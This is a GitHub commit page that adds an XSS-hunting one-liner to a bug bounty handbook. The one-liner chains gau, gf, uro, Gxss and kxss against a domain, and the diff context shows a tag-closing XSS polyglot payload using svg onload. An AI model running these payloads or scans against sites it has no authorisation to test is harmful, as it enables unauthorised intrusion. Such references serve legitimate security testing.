Skip to content

Commit

Permalink
added xss one-liner
Browse files Browse the repository at this point in the history
  • Loading branch information
0xsyr0 authored Nov 16, 2024
1 parent 2ab1841 commit 8fcbf83
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions handbooks/bug_bounty.md
Original file line number Diff line number Diff line change
Expand Up @@ -402,3 +402,9 @@ Note that `HTML tags` that need to be closed for `XSS`.
```c
--></title></textarea></style></noscript></script></xmp></template></noembed><svg/onload=alert()>
```

### Single Domain One-liner

```c
$ echo https://<DOMAIN>/ | gau | gf xss | uro | Gxss | kxss | tee <FILE>.txt
```

0 comments on commit 8fcbf83

Please sign in to comment.